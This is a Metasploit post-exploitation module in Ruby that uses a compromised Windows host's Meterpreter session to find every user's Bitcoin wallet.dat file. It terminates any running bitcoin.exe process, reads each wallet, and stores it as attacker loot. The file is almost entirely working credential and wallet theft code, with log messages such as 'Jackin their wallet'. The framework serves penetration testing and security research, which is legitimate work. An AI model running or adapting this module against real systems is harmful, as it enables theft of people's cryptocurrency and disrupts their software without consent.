metasploit-framework/modules/post/windows/gather/bitcoin_jacker.rb

81 lines
2.0 KiB
Ruby

# $Id$
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/user_profiles'
class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report
include Msf::Post::Windows::UserProfiles
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Gather Bitcoin wallet.dat',
'Description' => %q{
This module downloads any Bitcoin wallet.dat files from the target system
},
'License' => MSF_LICENSE,
'Author' => [ 'illwill <illwill[at]illmob.org>'],
'Version' => '$Revision$',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
print_status("Checking All Users For Bitcoin Wallet...")
grab_user_profiles().each do |user|
next if user['AppData'] == nil
tmpath= user['AppData'] + "\\Bitcoin\\wallet.dat"
jack_wallet(tmpath)
end
end
def jack_wallet(filename)
data = ""
found = session.fs.file.stat(filename) rescue nil
return if not found
print_status("Wallet Found At #{filename}")
print_status(" Jackin their wallet...")
kill_bitcoin
begin
wallet = session.fs.file.new(filename, "rb")
until wallet.eof?
data << wallet.read
end
store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet")
print_status(" Wallet Jacked.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Failed to download #{filename}: #{e.class} #{e}")
end
end
def kill_bitcoin
client.sys.process.get_processes().each do |x|
if x['name'].downcase == "bitcoin.exe"
print_status(" #{x['name']} Process Found...")
print_status(" Killing Process ID #{x['pid']}...")
session.sys.process.kill(x['pid']) rescue nil
end
end
end
end